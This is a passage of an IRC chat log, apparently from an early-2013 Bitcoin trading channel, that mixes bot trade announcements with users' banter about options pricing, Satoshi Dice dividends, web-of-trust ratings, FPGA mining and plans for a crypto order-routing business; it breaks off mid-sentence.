[MPEX] [S.MPOE] 7549 @ 0.00077 = 5.8127 BTC [+] Mar 03 01:04:50 sweet Mar 03 01:05:06 love getting SMS from localbitcoins.com Mar 03 01:19:25 [MPEX] [S.MPOE] 7382 @ 0.00077 = 5.6841 BTC [+] Mar 03 01:23:10 haha for the tesla ? Mar 03 01:23:59 still working on that Mar 03 01:24:10 got a USB stick for that wallet Mar 03 01:24:17 [HAVELOCK] [HIM] 6 @ 1.6 = 9.6 BTC [+] Mar 03 01:24:19 just waiting for coins to go up a bit more... Mar 03 01:24:29 yeah Mar 03 01:24:37 Also need to move to LA Mar 03 01:24:45 so you know, I can charge my car Mar 03 01:24:53 my bit car Mar 03 01:25:16 [HAVELOCK] [SDICE] 20 @ 0.674 = 13.48 BTC [+] Mar 03 01:25:29 "Sums up this subreddit pretty well." Mar 03 01:25:31 ahahaha wibn Mar 03 01:25:49 who did that ? Mar 03 01:26:40 jurov http://www.reddit.com/r/Bitcoin/comments/19jdmw/bitcoin_options_index_oix_price_sentiment/c8omekb Mar 03 01:26:43 that's your guy. Mar 03 01:27:37 hehe thx Mar 03 01:28:27 i'm just engrossed deep into taming mktdepth data to be used in google spreadsheet Mar 03 01:28:37 since namworld failed in that Mar 03 01:29:20 or he just exhausted all time in making pretty background, dunno Mar 03 01:30:06 lol Mar 03 01:30:59 yea man listen him! Mar 03 01:31:10 remove 30btc fee and make it point + click Mar 03 01:31:16 and preferable drag&drop too Mar 03 01:31:26 im too busy with http://polimedia.us/dtng/c/src/134290700472.jpg Mar 03 01:31:38 also, existing coinbr users may want to put their referral link there... but i may as well keep these 0.2% to myself :P Mar 03 01:34:39 oh my Mar 03 01:34:48 that's nice Mar 03 01:35:11 Images sent from mircea_popescu pie chart: http://i.imgur.com/1Y97ZnK.png Mar 03 01:35:44 thestringpuller :D Mar 03 01:35:53 you are overestimating bitcoin part Mar 03 01:36:04 take of a zero. Mar 03 01:36:07 there is no overlap? Mar 03 01:36:08 off Mar 03 01:36:21 kakobrekla you take it off. Mar 03 01:36:54 Bugpowder yes there is. proof : http://polimedia.us/dtng/c/src/136026418899.jpg Mar 03 01:37:03 lol Mar 03 01:37:32 I liked the previous one 100,000,000% more Mar 03 01:37:33 He photobombed us with balls Mar 03 01:42:32 [MPEX] [S.DICE] 110 @ 0.00610825 = 0.6719 BTC [-] Mar 03 01:42:34 [MPEX] [S.DICE] 500 @ 0.00610824 = 3.0541 BTC [-] Mar 03 01:42:36 [MPEX] [S.DICE] 100 @ 0.00610823 = 0.6108 BTC [-] Mar 03 01:42:37 [MPEX] [S.DICE] 1747 @ 0.00601401 = 10.5065 BTC [-] Mar 03 01:42:46 ;;ticker Mar 03 01:42:46 BTCUSD ticker | Best bid: 34.00501, Best ask: 34.12401, Bid-ask spread: 0.11900, Last trade: 34.12401, 24 hour volume: 37039.65816349, 24 hour low: 33.15000, 24 hour high: 34.80800, 24 hour vwap: 33.87769 Mar 03 01:43:13 a well. Mar 03 01:43:32 when do satoshi dice dividends pay? Mar 03 01:43:51 any day now. Mar 03 01:44:07 anyway, off to play path of exile with my all-female clan. bbiab. Mar 03 01:47:16 You get some good potential sitcom/dark comedy plots in /r/BreakUps: http://www.reddit.com/r/BreakUps/comments/19jjeu/one_of_his_five_girlfriendsat_the_same_time/ Mar 03 01:57:16 [MPEX] [S.MPOE] 16000 @ 0.00073887 = 11.8219 BTC [-] Mar 03 01:57:18 [MPEX] [S.MPOE] 5554 @ 0.00073886 = 4.1036 BTC [-] Mar 03 01:57:19 [MPEX] [S.MPOE] 96 @ 0.00073315 = 0.0704 BTC [-] Mar 03 02:03:59 https://bitcointalk.org/index.php?topic=134799.msg1576586#msg1576586 Mar 03 02:04:02 kinda funny. Mar 03 02:05:19 fuck, i forgot to run monthly fee :D Mar 03 02:05:29 Wonder how much time he spent on that Mar 03 02:08:07 Bugpowda Mar 03 02:08:27 You are my favorite scientist atm. Bill Nye ain't got nuttin on you. Mar 03 02:10:36 <3 Mar 03 02:15:29 [MPEX] [O.BTCUSD.P510T] 85 @ 0.71002991 = 60.3525 BTC Mar 03 02:15:47 [MPEX] [O.BTCUSD.P490T] 225 @ 0.64837795 = 145.885 BTC Mar 03 02:15:54 [MPEX] [O.BTCUSD.P470T] 450 @ 0.58814383 = 264.6647 BTC Mar 03 02:16:10 [MPEX] [O.BTCUSD.P450T] 675 @ 0.52952177 = 357.4272 BTC Mar 03 02:16:23 [MPEX] [O.BTCUSD.P430T] 815 @ 0.47272814 = 385.2734 BTC Mar 03 02:16:35 [MPEX] [O.BTCUSD.P410T] 680 @ 0.41800212 = 284.2414 BTC Mar 03 02:16:48 [MPEX] [O.BTCUSD.P390T] 445 @ 0.36560587 = 162.6946 BTC [+] Mar 03 02:17:03 [MPEX] [O.BTCUSD.P370T] 295 @ 0.31582454 = 93.1682 BTC Mar 03 02:17:11 [MPEX] [O.BTCUSD.P350T] 105 @ 0.26896955 = 28.2418 BTC [+] Mar 03 02:17:31 ;;ticker m oix^ Mar 03 02:17:32 (ticker [--bid|--ask|--last|--high|--low|--avg] [--currency XXX]) -- Return pretty-printed mtgox ticker. If one of the result options is given, returns only that numeric result (useful for nesting in calculations). If '--currency XXX' option is given, returns ticker for that three-letter currency code. It is up to you to make sure that the three letter code you enter is a valid currency (1 more message) Mar 03 02:18:00 ;;ticker m ^oix Mar 03 02:18:01 (ticker [--bid|--ask|--last|--high|--low|--avg] [--currency XXX]) -- Return pretty-printed mtgox ticker. If one of the result options is given, returns only that numeric result (useful for nesting in calculations). If '--currency XXX' option is given, returns ticker for that three-letter currency code. It is up to you to make sure that the three letter code you enter is a valid currency (1 more message) Mar 03 02:18:05 !ticker m ^oix Mar 03 02:18:07 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 28.20780706 / 40.92334054 / 44.82313733 (no shares, 14,082.43 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Mar 03 02:18:35 just 0.02 change? Mar 03 02:18:58 shorting Mar 03 02:19:03 ? Mar 03 02:19:11 Bot buys don't count Mar 03 02:19:30 why? only sells? Mar 03 02:19:36 that's nonsense Mar 03 02:19:51 Nprpreents double counting Mar 03 02:19:55 Prevents Mar 03 02:20:07 if i do split and short sell, that sell is counted in, no? Mar 03 02:21:14 (42 - 51) / 51 Mar 03 02:21:19 ;;calc (42 - 51) / 51 Mar 03 02:21:20 -0.176470588235 Mar 03 02:21:38 Dunno Mar 03 02:22:11 Those were real buys Mar 03 02:22:14 Not shorts Mar 03 02:22:48 it should have no regard where the options come from Mar 03 02:23:19 anyway based on my spreadsheet shenanigans, the breakeven point is a bit different from real profitability Mar 03 02:23:48 It moved over $2 btw Mar 03 02:24:08 The calls only price didn't move Mar 03 02:24:20 But tr joint price dropped to $40 Mar 03 02:24:23 from 44.80704907 -> 44.82313733 Mar 03 02:24:40 avg is the middle number? ah yes Mar 03 02:25:35 Topic jack: http://answers.yahoo.com/question/index?qid=20100426131644AAKwLMj - discuss Mar 03 02:25:40 Inhibitor23 reddit comment reeks of mp writing it Mar 03 02:26:00 I never answer questions that end with "discuss" Mar 03 02:26:17 Such a presumption that the question is worth discussion! Mar 03 02:26:33 Selling up to 100 ASICMINER shares, pm me with offers. Mar 03 02:27:10 5btc Mar 03 02:27:12 TradeFortress ask topace he's doing pt Mar 03 02:27:25 or burnside? Mar 03 02:27:35 hmm I thought burnside had enough shares for now Mar 03 02:27:36 "mircea, if you were half as smart as you think you are, you wouldn't confuse coinbase and coinlab. you'd also have invented antigravity and a time machine, but that's beside the point." - whatcha have to say about that mr. popescu? Mar 03 02:27:41 but thanks jurov Mar 03 02:29:40 ;;id denialdenial Mar 03 02:29:40 Error: "id" is not a valid command. Mar 03 02:29:59 what up yo Mar 03 02:30:11 i let my slip show Mar 03 02:30:13 jurov: is my account just inactive? I don't have to register and blah blah blah aain no? Mar 03 02:30:17 again* Mar 03 02:30:45 you don't have to do anything. but it's good to check just in case Mar 03 02:31:21 y u ident me Mar 03 02:31:49 i havve a new nick so waht want to fight about it Mar 03 02:31:50 i remember paying out s.bvps to someone who has withdrawn everything (perhaps thinking he'll avoid monthly fee which isn't the case) Mar 03 02:32:06 ;;dox denialdenial Mar 03 02:32:07 Error: "dox" is not a valid command. Mar 03 02:32:52 lol Mar 03 02:33:54 that was me jurov Mar 03 02:34:04 SO Mar 03 02:34:09 what's that supposed to mean Mar 03 02:34:16 I'm going to have HUGE monthly fee? Mar 03 02:34:21 >:( Mar 03 02:34:36 IF and only if I were to ever go back. Mar 03 02:34:48 as long as there's anything on your account (even if you have 0 btc), you pay Mar 03 02:35:24 congratulations! the first BTC Debt account ever created by moi cause I'm never logging back in if that's the case har har har Mar 03 02:35:38 [MPEX] [O.BTCUSD.C370T] 24 @ 0.20220992 = 4.853 BTC [-] Mar 03 02:36:13 thestringpuller, i went to extra hassle to intimidate poor namworld into paying out Mar 03 02:36:31 hi all Mar 03 02:36:46 hi Mar 03 02:36:52 and this is the result. in the future i'll just terminate the asset without any recompensation >:D Mar 03 02:36:56 thanks for following me :) Mar 03 02:37:04 and refer everyone to thestringpuller :D Mar 03 02:37:12 @btcshares Mar 03 02:37:19 all the money that I had in conibr went to smickles Mar 03 02:37:23 so I will refer people to smickles Mar 03 02:37:27 you are bets of bitcoins right? Mar 03 02:37:35 no Mar 03 02:37:39 oh nvm Mar 03 02:37:47 thought that was a nickname for bbet Mar 03 02:38:01 bitbet? Mar 03 02:38:16 bets of bitcoins is some other site Mar 03 02:38:37 thestringpuller, srsly. so you want to wipe the acct completely? Mar 03 02:38:53 yes, i see they are two different sites now Mar 03 02:40:01 hey jurov, sorry i am negative, should i liquidate a position or can we wait for s.dice dividends? Mar 03 02:40:25 i thought they would be in by now Mar 03 02:40:39 they will be anytime till March 5 Mar 03 02:41:06 k, if that is too long i can liquidate mpoe Mar 03 02:41:24 or i will just fund some more Mar 03 02:43:37 prehaps it's because S.DICE wants bigger dividends this month so they're delaying it until the 5th Mar 03 02:43:46 yeah, i'll fund some more, should be in by tomorrow morning, hopefully i can scoop up some more s.dice too lol Mar 03 02:44:10 TradeFortress: pretty sure they will just cut it off at the 28th and the rest goes toward next month Mar 03 02:44:26 i know that whole group is on a trip at the moment Mar 03 02:44:56 but from what i saw on a forum post, it seems they had a good month Mar 03 02:45:00 hmm yeah Mar 03 02:45:39 http://trilema.com/2013/the-anatomy-of-a-disaster/ Mar 03 02:46:30 if i do split and short sell, that sell is counted in, no? << no. bot's sales only. Mar 03 02:46:46 LOL Mar 03 02:46:51 thestringpuller : that's nice, my antigrav unit is humming quietly in the basement. now what ? Mar 03 02:47:09 lol nice post mp Mar 03 02:48:21 i bet. Mar 03 02:49:13 prehaps it's because S.DICE wants bigger dividends this month so they're delaying it until the 5th << that's not how it works, divs are for feb Mar 03 02:50:49 voorhees is busy atm Mar 03 02:50:52 just like everyone Mar 03 02:51:09 mircea_popescu, yeah, I get it now Mar 03 02:51:12 :) Mar 03 02:51:46 http://bitbet.us/bet/269/avalon-will-deliver-asic-devices-before-april-1st/ Mar 03 02:51:49 4:1 for. i wonder Mar 03 02:53:15 [BTCTC] [GSDPT] 38 @ 0.006296 = 0.2392 BTC [-] Mar 03 02:55:18 EDIT: I found a formula which is almost correct for WEIGHT > 3000, it is: Mar 03 02:55:18 Reward = TOTAL * 0.99 * MY_BET * SQRT(LOG(WEIGHT))*WEIGHT^(1/6.0) / Sum_all(winning_bets * SQRT(LOG(WEIGHT))*WEIGHT^(1/6.0)) Mar 03 02:55:22 kakobrekla dude that's rad. Mar 03 02:55:28 :DD Mar 03 02:55:30 he actually interpolated with logs and whatnot ?! Mar 03 02:55:41 yeah i was liek wtf mate Mar 03 02:56:02 at least he doesn't have cauchy operators in there Mar 03 02:56:09 or like, wave functions. Mar 03 02:56:10 :) Mar 03 02:56:26 maybe even rand() Mar 03 02:56:36 stfu giving away secret bitbet sauce like that Mar 03 02:56:49 ;) Mar 03 02:58:12 "This is awesome! I didn't even know such an exchange existed." Mar 03 02:58:22 reddit. Mar 03 03:01:54 maybe that dude ran critticall over bbet data Mar 03 03:03:04 reddit: http://www.reddit.com/r/Bitcoin/comments/19jdmw/bitcoin_options_index_oix_price_sentiment/c8ol2c0 Mar 03 03:03:08 lol, this is the best irc channel ever Mar 03 03:03:26 someone should really make a tv show about bitcoin...the drama lol Mar 03 03:04:03 TradeFortress yea totally. Mar 03 03:04:06 mjr_ it is! Mar 03 03:04:39 note to self: start writing pilot based on bitcoins Mar 03 03:04:53 er... plot? Mar 03 03:05:06 jurov like seinfeld. Mar 03 03:05:08 no pilot Mar 03 03:05:26 pilot episode for people to watch and decide to buy a season Mar 03 03:05:39 not that i have ever done that Mar 03 03:05:48 but hey how hard can it be right lol Mar 03 03:06:06 maybe go straight to netflix or something Mar 03 03:06:08 i recommend it to involve satoshi building it all only for him be able to raise money for clay mugs workshop and troll around Mar 03 03:06:11 i'd like to do a porny show. Mar 03 03:06:13 it'd be a sitcum Mar 03 03:06:19 HAHAHA Mar 03 03:06:21 sadly i don't have the time / it doesn't pay enough Mar 03 03:06:31 you know what they say... Mar 03 03:06:42 the man who does what he loves never works a day in his ligfe Mar 03 03:06:53 Unexpected token ) Mar 03 03:06:54 fuuu Mar 03 03:07:15 but srsly, the funny life of this guy who lives with like, 5 chicks. Mar 03 03:07:19 that are naked while indoors Mar 03 03:07:25 and sometimes outdoors Mar 03 03:07:35 and sometimes wear strange contraptions Mar 03 03:07:44 if anyone wants to see a really crappy website, feel free to check out btcshares.com Mar 03 03:07:52 its basically just a placeholder Mar 03 03:07:53 and judging from the photos, never wear hair Mar 03 03:07:54 for now Mar 03 03:07:57 did TradeFortress make it ? Mar 03 03:08:03 nope, yours truly Mar 03 03:08:10 jurov notice that all hair is wet ? Mar 03 03:08:11 100% mjr original Mar 03 03:08:22 what? Mar 03 03:08:23 except for all the copying and pasting Mar 03 03:08:28 lmao welcome to donate bitcoin Mar 03 03:08:33 that's a concept Mar 03 03:08:33 hahaha Mar 03 03:08:34 yes Mar 03 03:08:40 that is the service i provide Mar 03 03:08:47 a place to donate bitcoins to me Mar 03 03:08:50 it's also not alligned Mar 03 03:08:55 i know Mar 03 03:09:00 which is extremely annoying to me Mar 03 03:09:14 like i said, placeholder Mar 03 03:09:27 i worked on all the backend stuff today Mar 03 03:09:32 tomorrow i try to do design stuff Mar 03 03:09:48 data-address="1LokQrHj14NU93tC6pZfTZyyRHhAVakQmX" Mar 03 03:09:49 but i set up twitter, email, admin stuff...and got the website online Mar 03 03:09:54 i stole ya address Mar 03 03:09:58 mjr_ doesn't even change the cursor Mar 03 03:09:59 tomorrow we design Mar 03 03:10:01 TradeFortress just jabbing at you re your forum encounter Mar 03 03:10:15 which cursor? Mar 03 03:10:23 oh for the donate button? Mar 03 03:11:07 yup Mar 03 03:11:08 yeah, well, i included that only to try it out Mar 03 03:11:20 and cuz i wanted to get the btcshares label for an address Mar 03 03:11:21 mircea_popescu, lol Mar 03 03:11:27 although maybe i will try to get a vanity address Mar 03 03:11:53 i made that site in under an hour just to test switching domain stuff and getting dns in order Mar 03 03:12:09 like 5 min might be more accurate as far as design and aesthetics Mar 03 03:12:18 do you sell ads? Mar 03 03:12:26 no Mar 03 03:12:29 don't plan on it Mar 03 03:12:41 i plan on just hosting my performance and financials there Mar 03 03:12:44 are you in the wot ? Mar 03 03:12:46 eventually Mar 03 03:12:50 i am not as of yhet Mar 03 03:12:55 do that first. Mar 03 03:13:06 good idea Mar 03 03:13:14 how do you establish trust though? Mar 03 03:13:20 i am not going to trade at all Mar 03 03:13:23 i just use exchanges Mar 03 03:13:49 performance as financials as to what then ? Mar 03 03:14:02 oh, i am getting $ clients Mar 03 03:14:18 people who know about bitcoins probbably can figure it out for themselves Mar 03 03:14:21 but old people with cash can't Mar 03 03:14:22 mjr_ if you use coinbr you can ask me to look up. i'll then rate you like "-10 did not pay coinbr monthly fee" Mar 03 03:14:33 lol Mar 03 03:14:34 makomk malaimo markedathome|wth maximian midnightmagic MiningBuddy mircea_popescu mjr_ mjr__ mod6 molec Mar 03 03:14:34 true Mar 03 03:14:48 although to be fair i paid most of it so far Mar 03 03:14:49 mjr_ lisrten, that's half of the story. what do you do with the bitcoins ? Mar 03 03:14:55 s.dice Mar 03 03:14:58 mpoe Mar 03 03:15:00 options Mar 03 03:15:01 etc Mar 03 03:15:07 so suppose one day you loan some shares out to someone Mar 03 03:15:08 rated. Mar 03 03:15:09 hopefully lend them Mar 03 03:15:13 some other day maybe you borrow. Mar 03 03:15:14 i currently do this for older or newb people as well Mar 03 03:15:14 rated. Mar 03 03:15:16 etc. Mar 03 03:15:23 yes very true Mar 03 03:15:26 i will need it Mar 03 03:15:35 and i will probably eventually need a seat on mpex Mar 03 03:15:41 i charge a 10% helpers fee Mar 03 03:16:06 i also have a mining operation getting under way Mar 03 03:16:12 FPGA's... Mar 03 03:16:17 but not little puny ones Mar 03 03:16:20 BIG ones Mar 03 03:16:26 hoping for 10GH per card Mar 03 03:16:31 um Mar 03 03:16:34 which cards are these ? Mar 03 03:16:35 make sure you try ordering from BFL labs today Mar 03 03:16:45 start with 3 cards...not the best, but still half an avalon almost Mar 03 03:16:50 Virtex-6's Mar 03 03:17:03 way larger than spartans or altera's Mar 03 03:17:11 40nm process Mar 03 03:17:15 hoping for 10gh per Mar 03 03:17:17 i dunno if i'd buy new fpga's today tho Mar 03 03:17:20 maybe overly optimistic Mar 03 03:17:23 lol, buy Mar 03 03:17:24 but if used and a good price i guess may be a good deal Mar 03 03:17:32 free and sitting around Mar 03 03:17:36 no electricity Mar 03 03:17:36 o that works Mar 03 03:17:39 yep Mar 03 03:17:45 mjr_ there's sometimes a good deal on -otc too, i got amazon codes, small paypal payments and like Mar 03 03:17:58 3 of those, plus maybe one virtex 5 if worth it Mar 03 03:18:08 jurov: good point Mar 03 03:18:20 he has a point. also, you'd think i'd never trade. yet recently i got like a dozen sa gift certs. Mar 03 03:18:25 it was nice and easy Mar 03 03:18:33 what is sa? Mar 03 03:18:36 some forum Mar 03 03:18:42 haha Mar 03 03:18:43 oh yeah i remember Mar 03 03:18:45 lol Mar 03 03:18:48 that was funny Mar 03 03:20:12 anyways, i have 3 small projects and one big one Mar 03 03:20:25 the bitch ain't one Mar 03 03:20:27 ;;eauth mircea_popescu Mar 03 03:20:28 Request successful for user mircea_popescu, hostmask mircea_popescu!~Mircea@pdpc/supporter/silver/mircea-popescu. Get your encrypted OTP from http://bitcoin-otc.com/otps/8A736F0E2FB7B452 Mar 03 03:20:35 the fpga miners, the boutique hedge fund, and a bitcoin horseracing sitte Mar 03 03:20:56 the big one...is big Mar 03 03:21:04 [BTCTC] [COGNITIVE] 6 @ 0.3 = 1.8 BTC [+] Mar 03 03:21:12 ;;everify freenode:#bitcoin-otc:651ee0e4570cc2d14ea53173c276c5bce82d794a92202d3779ffbf90 Mar 03 03:21:13 You are now authenticated for user mircea_popescu with key 8A736F0E2FB7B452 Mar 03 03:21:25 ;;rate kakobrekla 5 too much stuff to list. inquire within. Mar 03 03:21:40 Rating entry successful. Your rating for user kakobrekla has changed from 3 to 5. Mar 03 03:22:22 ;;rated nefario Mar 03 03:22:23 You rated user nefario on Tue Sep 25 02:55:21 2012, giving him a rating of -1, and supplied these additional notes: runs a scammy btc securities exchange . associated with the bitcoin consultancy scammer group.. Mar 03 03:22:33 whoa i got him early. Mar 03 03:22:47 who is nefario? Mar 03 03:23:30 ;;rated davout Mar 03 03:23:31 You rated user davout on Sat Dec 8 05:09:24 2012, giving him a rating of 1, and supplied these additional notes: bitcoin-central.net paymium etc. Mar 03 03:23:36 mjr_ do you know about glbse? he was its owner Mar 03 03:23:41 ;;rate davout 3 bitcoin-central.net paymium etc. Mar 03 03:23:43 Rating entry successful. Your rating for user davout has changed from 1 to 3. Mar 03 03:23:43 oh yea Mar 03 03:23:46 i heard about that Mar 03 03:23:58 [BTCTC] [GSDPT] 180 @ 0.006296 = 1.1333 BTC [-] Mar 03 03:24:12 asicminer is from there right? Mar 03 03:24:35 just starting to get everything back together from what i read Mar 03 03:25:17 mircea do you ever use btc-e? Mar 03 03:25:27 or anyone else for that matter... Mar 03 03:26:05 i never used btc-e Mar 03 03:26:20 mjr_ only for small litecoin trades Mar 03 03:26:21 if i used anything it'd prolly be davout's ting Mar 03 03:27:14 ;;rated jurov Mar 03 03:27:15 You rated user jurov on Fri Sep 28 03:13:37 2012, giving him a rating of 3, and supplied these additional notes: runs coinbr.com, MPEx broker website. Mar 03 03:27:44 ;;rate jurov 4 runs coinbr.com, MPEx broker website. Mar 03 03:27:46 Rating entry successful. Your rating for user jurov has changed from 3 to 4. Mar 03 03:27:55 lol nice $17 spread Mar 03 03:28:12 where? Mar 03 03:28:19 on bitcoin central Mar 03 03:28:25 only ask is at $47 Mar 03 03:28:25 what srsly ? Mar 03 03:28:32 bids at 30 Mar 03 03:28:35 yep Mar 03 03:28:35 mjr_ they're euro tho Mar 03 03:28:38 no Mar 03 03:28:43 i switched to dollars Mar 03 03:28:46 oh i get what you mean Mar 03 03:28:51 well their dollar market has like... no epth Mar 03 03:28:51 very small dollar volume Mar 03 03:29:26 ah yeah, their euro book is a lot better Mar 03 03:29:29 inexplicably they have little euro depth too Mar 03 03:29:40 well yeah, but better than dollar for sure Mar 03 03:29:58 but they seem to me more trustworthy than anyone else on the strength of actually getting the bank partnerships right Mar 03 03:30:12 i have no idea why uptake so low. Mar 03 03:30:18 well, i hope to change that Mar 03 03:30:31 working on an aggregated order book...and then hopefully a routing and matching engine Mar 03 03:30:36 that is the big thing Mar 03 03:31:09 hoping to get a big source of volume soon Mar 03 03:31:14 open up a new market Mar 03 03:31:28 and need to provide a steady access to all markets to convince them Mar 03 03:32:09 that is basically what my company already does for equity markets in US Mar 03 03:32:14 routing and flow Mar 03 03:32:15 [BTCTC] [BTC-BOND] 20 @ 0.00996 = 0.1992 BTC [-] Mar 03 03:32:26 buy from this dark pool, sell on that one Mar 03 03:32:27 etc Mar 03 03:32:49 so if someone would just do that for btc it would make everyone's lives a lot easier Mar 03 03:34:21 you can probably handle it on otc if you know the rifght people Mar 03 03:34:30 which is what makes your wot suddenly crucial for your success. Mar 03 03:34:30 [BTCTC] [B.YABMC] 7 @ 0.008299 = 0.0581 BTC [-] Mar 03 03:34:38 well, its all about automating it Mar 03 03:34:48 not until you've made your contacts it isn't. Mar 03 03:35:27 well, my partner is working on the order flow Mar 03 03:35:36 and we already have some sick back end infrastructure Mar 03 03:35:43 data center colocation etc Mar 03 03:35:55 bitcoin is primarily about who you know. Mar 03 03:36:02 and some really nice enterprise level matching engine and algorithmic trading unit Mar 03 03:36:09 and yes it Mar 03 03:36:10 is Mar 03 03:36:19 i def do need WoT Mar 03 03:36:25 can i work on it tomorrow? Mar 03 03:36:30 if you guys are around? Mar 03 03:36:42 tomorrow is sunday, we're closed Mar 03 03:37:07 :P Mar 03 03:37:09 lol you just need the bot Mar 03 03:37:27 lol Mar 03 03:37:34 i mean, what address should i use? Mar 03 03:37:52 should i maintain a separate one for business and personal? Mar 03 03:38:22 mjr_ i think most of us have one common address/privkey Mar 03 03:39:20 [HAVELOCK] [SDICE] 15 @ 0.66 = 9.9 BTC [-] Mar 03 03:39:28 and it isn't clear to me why/how would you want to manage separate webs of trust Mar 03 03:40:19 well Mar 03 03:40:41 i mean as long as i run my business it would be important for me to have a high wot rating Mar 03 03:40:50 but if i were to leave...i couldn't leave it to someone else Mar 03 03:40:52 it depends Mar 03 03:40:54 could i? Mar 03 03:41:04 is your business pandering hard to the community or mainstream? Mar 03 03:41:09 mainstream Mar 03 03:41:17 [MPEX] [S.MPOE] 11129 @ 0.0007449 = 8.29 BTC [+] Mar 03 03:41:18 then i wouldn't worry about WOT so much Mar 03 03:41:23 well, still important Mar 03 03:41:30 to the community Mar 03 03:41:31 even from marketing perspective Mar 03 03:41:34 mainstream have no clue about it Mar 03 03:41:38 of course Mar 03 03:41:44 but you know how people list stuff on websites Mar 03 03:41:50 and i may need to do stuff using otc Mar 03 03:42:02 yeah Mar 03 03:42:08 but would rather my corporate persona was the one who had the trust Mar 03 03:42:19 i don't plan on doing a lot personally Mar 03 03:42:22 don't get caught up in a rating war tho Mar 03 03:42:28 yeah Mar 03 03:42:29 could be damaging to business rep Mar 03 03:42:33 true Mar 03 03:42:40 like i said, i haven't used otc yet Mar 03 03:42:48 and maybe i might toy with it Mar 03 03:42:57 but i want computers to deal with stuff like that Mar 03 03:43:11 we'll see how it goes. dunno if there was anyone who maintained corporate persona on wot Mar 03 03:43:12 the matching engine and such Mar 03 03:43:23 yeah, i kind of like how it is very personal here Mar 03 03:43:23 yeah there's no point Mar 03 03:43:37 better off having a customer feedback thing on your site or osmething Mar 03 03:43:49 quotes from mainstream professionals Mar 03 03:43:57 well, as i said, my goal is to be a layer between a big mainstream source and a bunch of exchanges Mar 03 03:44:06 "wow this site is really good" Mark Cuban Mar 03 03:44:16 ideally the mainstream end users wouldn't even be aware of me Mar 03 03:44:16 compared to Mar 03 03:44:25 +1 yeah we had a good trade - BitHub Mar 03 03:44:27 there are some companies that have 20-30k accounts Mar 03 03:44:42 and all those guys do is trade forex Mar 03 03:44:55 but they would need a STRONG source of liquidity Mar 03 03:45:01 and the best bids and asks Mar 03 03:45:17 BitHub is currently building infrastructure, investing and networking within the Bitcoin community and the Mainstream to bridge the two together to provide a very straight forward, trustworthy, professional services. Mar 03 03:45:37 and enterprise level hardware with some big financial people behind it Mar 03 03:45:46 yeah that is the goal right Mar 03 03:46:09 i have been disheartened by how hard it is for people on wall street to get in the game Mar 03 03:46:14 for example Mar 03 03:46:25 traders at my firm have half a mill to play with at work Mar 03 03:46:27 isn't it about to get alot easier for them Mar 03 03:46:30 via coinlab Mar 03 03:46:35 yeah...believe it when i see it Mar 03 03:46:49 or tell your wall street buddies to buy into a bitcoin company Mar 03 03:46:51 not to mention...it would just be a mt gox pass through Mar 03 03:47:00 prop traders Mar 03 03:47:05 they don't own their positions Mar 03 03:47:09 and they trade with high leverage Mar 03 03:47:13 intra day Mar 03 03:47:20 that's where you come in my friend as a Bitcoin Broker and you do it for these people and charge them a broker fee Mar 03 03:47:20 they couldn't invest outside of work Mar 03 03:47:23 don't teach them Mar 03 03:47:28 yes Mar 03 03:47:31 true Mar 03 03:47:42 but they can't press buttons to make bitcoins appear on their screens Mar 03 03:47:48 outsource some helpers from china Mar 03 03:48:07 and till someone makes it so that you can use etrade (def not what we use) or like a sterling or laser type platform Mar 03 03:48:12 they don't need to, they just go to your site, type in a code or whatever and can see their balance Mar 03 03:48:14 professional traders can't get involved Mar 03 03:48:30 i mean, their accounts with their money can't connect to my website Mar 03 03:48:40 and it isn't really their website Mar 03 03:48:45 i mean their money Mar 03 03:48:54 they get to trade with 20x or more leverage Mar 03 03:49:02 cant you set up your own bank account and get these people to dump the fiat in there? Mar 03 03:49:06 but they leave all that at the office Mar 03 03:49:10 and then you make the bitcoin buys for them? Mar 03 03:49:14 i would love to Mar 03 03:49:16 but again Mar 03 03:49:23 basically they have to use their trading accounts Mar 03 03:49:40 and their trading accounts connect to nyse, nasdaq, edgea, edgex, bats etc Mar 03 03:49:48 so they can buy stuff from there Mar 03 03:49:51 and that's all Mar 03 03:49:57 i see Mar 03 03:50:02 mjr_ have you seen bit4x.com or 1broker.com ? Mar 03 03:50:02 and that is how most of finance is Mar 03 03:50:23 so you need a bitcoin platform that can kind of plug into that exisiting platform? Mar 03 03:51:02 yes Mar 03 03:51:09 because they're using their coporate trading accounts Mar 03 03:51:11 i need them to be able to plug in bloomberg Mar 03 03:51:14 or whatever Mar 03 03:51:15 which is like really big money Mar 03 03:51:17 yes Mar 03 03:51:28 if they open up their own accounts it might be 500 Mar 03 03:51:38 their professional accounts might be over 1 mill Mar 03 03:51:40 500g's? Mar 03 03:51:41 jesus Mar 03 03:51:46 no $500 Mar 03 03:51:50 oh Mar 03 03:51:52 traders don't do it at home Mar 03 03:51:58 or maybe a little Mar 03 03:52:09 but again typically with their 401k or their investment account Mar 03 03:52:18 the goal for me is to not make them open up a new account Mar 03 03:52:19 what the fuck are you all on about? Mar 03 03:52:23 hmmm follow the coinlab stuff Mar 03 03:52:26 but rather give them something to buy with their existing accounts Mar 03 03:52:37 i've been watching Mar 03 03:53:03 maybe you can act as a broker for them via that site Mar 03 03:53:13 so they only have to deal with you Mar 03 03:53:21 too long; didn't read: wall street professionals don't open up new accounts for all their trades, they use their existing high margin accounts Mar 03 03:53:35 that's the goal for the platform, plug into existing infrastructure Mar 03 03:53:46 and become the gateway for that infrastructure to the bitcoin world Mar 03 03:54:14 but the exisiting infrastructure its not like you could plug gox right into it yeah? Mar 03 03:54:18 nope Mar 03 03:54:21 not as of yet Mar 03 03:54:25 there's alot of licences, government approval wallstreet approval etc etc Mar 03 03:54:30 well yeah Mar 03 03:54:38 BitHub: I wouldtn btoher with coinlab Mar 03 03:54:41 but it is mostly a matter of getting the deal Mar 03 03:54:43 there will be other options for gox Mar 03 03:54:46 before their thing hits Mar 03 03:54:47 yeah Mar 03 03:54:52 trust me on this. ;) Mar 03 03:54:52 Ukto ;) Mar 03 03:55:03 my point is that everyone doesn't use nasdaq to trade aapl Mar 03 03:55:04 we talked about it yesterday Mar 03 03:55:13 even though aapl is listed on nasdaq Mar 03 03:55:28 i can buy aapl on any one of a ton of differrent venues Mar 03 03:55:43 and they all have different fees, volume, prices Mar 03 03:55:51 so i can pick and choose Mar 03 03:56:07 so someone has to offer choices and volume Mar 03 03:56:15 its a long tough road i think Mar 03 03:56:26 which is why i am more excited abvout my small easy projects Mar 03 03:56:35 which are already coming together Mar 03 03:56:41 lol build a miner Mar 03 03:57:11 when i showed a trader what i was doing, he was like "why aren't you scalping this all day, like do it right 